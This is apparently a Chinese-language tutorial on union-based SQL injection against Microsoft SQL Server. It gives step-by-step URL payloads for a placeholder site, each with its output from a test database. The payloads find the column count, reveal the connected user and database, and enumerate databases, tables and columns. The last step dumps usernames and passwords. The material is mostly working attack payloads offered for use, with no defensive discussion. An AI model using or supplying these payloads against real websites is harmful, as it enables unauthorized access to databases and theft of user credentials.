0x00 概要
在页面有显示位的情况下使用
0x01 测试数据
1> select * from article;2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 |+----+-----------+-----------+(2 rows affected)
# 测试表数据: users;sql server> select * from users;+----+--------------+----------+| id | username | password |+----+--------------+----------+| 1 | test-user-01 | 123456 || 2 | test-user-02 | 234567 |+----+--------------+----------+2 rows in set (0.00 sec)
sql server> SELECT system_user;+-----------------------+| field1 |+-----------------------+| sa |+-----------------------+1 row in set (0.00 sec)
sql server> select db_name();+-----------------------+| field1 |+-----------------------+| test |+-----------------------+1 row in set (0.00 sec)
0x02 查看列数
web语句: http://www.test.com/sql.php?id=1 order by 3
数据库语句: select * from users where id=1 order by 3
# 正确的时候 会返回原来的数据+-----+--------------+------------+| id | username | password |+--------+------------+-----------+| 1 | test-user-01 | 123456 |+-----+--------------+------------+(1 rows affected)
# 错误的时候sql server> select * from users where id=1 order by 4;42000 - [SQL Server]ORDER BY 位置号 4 超出了选择列表中项数的范围。
0x03 爆当前连接用户
web语句: http://www.test.com/sql.php?id=-1 union select system_user,null,null
数据库语句: select * from users where id=-1 union select system_user,null,null
1> select * from users where id=-1 union select system_user,null,null;+----+----------+-----------+| id | username | password |+----+----------+-----------+| sa | null | null |+----+----------+-----------+(1 rows affected)
0x04 爆当前连接的数据库
web语句: http://www.test.com/sql.php?id=-1 union select null,db_name(),null
数据库语句: select * from users where id=-1 union select null,db_name(),null
1> select * from users where id=-1 union select null,db_name(),null;+----+----------+-----------+| id | username | password |+----+----------+-----------+|null| test | null |+----+----------+-----------+(1 rows affected)
0x05 爆库名方法一
注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库
web语句: http://www.test.com/sql.php?id=-1 union select null,db_name(1),null
数据库语句: select * from users where id=-1 union select null,db_name(1),null
# 获取 1库1> select * from users where id=-1 union select null,db_name(1),null;+------+----------+-----------+| id | username | password |+------+----------+-----------+| NULL | master | NULL |+------+----------+-----------+(1 rows affected)
# 获取 2库1> select * from users where id=-1 union select null,db_name(2),null;+------+----------+-----------+| id | username | password |+------+----------+-----------+| NULL | tempdb | NULL |+------+----------+-----------+(1 rows affected)
0x06 爆库名方法二
优点:简单
缺点:要是查询的 dbid 刚好不存在,那么就会查询不出数据
查询不同的库可以这样
例如:
修改 dbid>=1
修改 dbid>=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1
数据库语句: select * from users where id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1
# 获取 1库1> SELECT*FROMusersWHEREid =- 1UNIONSELECTTOP 1 NULL,name,NULLFROMmaster.dbo.sysdatabasesWHEREdbid >= 1;+------+----------+-----------+| id | username | password |+------+----------+-----------+| NULL | master | NULL |+------+----------+-----------+(1 rows affected)
# 获取 2库1> SELECT*FROMusersWHEREid =- 1UNIONSELECTTOP 1 NULL,name,NULLFROMmaster.dbo.sysdatabasesWHEREdbid >= 2;+------+----------+-----------+| id | username | password |+------+----------+-----------+| NULL | tempdb | NULL |+------+----------+-----------+(1 rows affected)
0x06 爆库名方法三
优点:可以保证每个 row_number 都是查询的到的
注意:
OVER(Order by dbid) 里面的 dbid 要修改为 master.dbo.sysdatabases 表里面存在的一个字段
查询不同的库可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1
数据库语句: select * from users where id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1
# 获取 1库1> SELECT*FROMusersWHEREid =- 1UNIONSELECTTOP 1 NULL,a.name,NULLFROM(SELECTROW_NUMBER () OVER (ORDER BY dbid) AS row_number,nameFROMmaster.dbo.sysdatabases) AS aWHERErow_number = 1;+------+----------+-----------+| id | username | password |+------+----------+-----------+| NULL | master | NULL |+------+----------+-----------+(1 rows affected)
1> SELECT*FROMusersWHEREid =- 1UNIONSELECTTOP 1 NULL,a.name,NULLFROM(SELECTROW_NUMBER () OVER (ORDER BY dbid) AS row_number,nameFROMmaster.dbo.sysdatabases) AS aWHERErow_number = 2;+------+----------+-----------+| id | username | password |+------+----------+-----------+| NULL | tempdb | NULL |+------+----------+-----------+(1 rows affected)
0x07 爆表名
注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段
查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1
数据库语句: select * from users where id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1
# 爆 1表1> SELECT*FROMusersWHEREid =- 1UNIONSELECTTOP 1 NULL,a.table_name,NULLFROM(SELECTROW_NUMBER () OVER (ORDER BY table_name) AS row_number,table_nameFROMinformation_schema.tablesWHEREtable_catalog = db_name()) AS aWHERErow_number = 1;2> go+------+----------+-----------+| id | username | password |+------+----------+-----------+| NULL | article | NULL |+------+----------+-----------+(1 rows affected)
# 爆 2表1> SELECT*FROMusersWHEREid =- 1UNIONSELECTTOP 1 NULL,a.table_name,NULLFROM(SELECTROW_NUMBER () OVER (ORDER BY table_name) AS row_number,table_nameFROMinformation_schema.tablesWHEREtable_catalog = db_name()) AS aWHERErow_number = 2;2> go+------+----------+-----------+| id | username | password |+------+----------+-----------+| NULL | users | NULL |+------+----------+-----------+(1 rows affected)
0x08 暴字段
注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段
查询不同的表可以这样
例如:
table_name=’要查询的表名’
查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1
数据库语句: select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1
# 获取当前库 users表 第一个字段名称1>SELECTTOP 1 NULL,a.column_name,NULLFROM(SELECTROW_NUMBER () OVER (ORDER BY column_name) AS row_number,column_nameFROMinformation_schema.columnsWHEREtable_catalog = db_name()AND table_name = 'users') AS aWHERErow_number = 1;2> go+------+-------------+------+| | column_name | |+------+-------------+------+| NULL | id | NULL |+------+-------------+------+(1 rows affected)
# 获取当前库 users表 第二个字段名称1>SELECTTOP 1 NULL,a.column_name,NULLFROM(SELECTROW_NUMBER () OVER (ORDER BY column_name) AS row_number,column_nameFROMinformation_schema.columnsWHEREtable_catalog = db_name()AND table_name = 'users') AS aWHERErow_number = 2;2> go+------+-------------+------+| | column_name | |+------+-------------+------+| NULL | password | NULL |+------+-------------+------+(1 rows affected)
0x09 爆内容
注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1
数据库语句: select from users where id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1
# 查询users表 第一条数据1> SELECT*FROMusersWHEREid =- 1UNIONSELECTa.id,a.username,a.passwordFROM(SELECTROW_NUMBER () OVER (ORDER BY username) AS row_number ,*FROMusers) AS aWHERErow_number = 1;2> go+--------+------------+-----------+| id | username | password |+--------+------------+-----------+| 1 | test-user-01 | 123456 |+--------+------------+-----------+(1 rows affected)
# 查询users表 第二条数据1> SELECT*FROMusersWHEREid =- 1UNIONSELECTa.id,a.username,a.passwordFROM(SELECTROW_NUMBER () OVER (ORDER BY username) AS row_number ,*FROMusers) AS aWHERErow_number = 2;2> go+--------+------------+-----------+| id | username | password |+--------+------------+-----------+| 2 | test-user-02 | 234567 |+--------+------------+-----------+(1 rows affected)
若有收获,就点个赞吧
0 人点赞
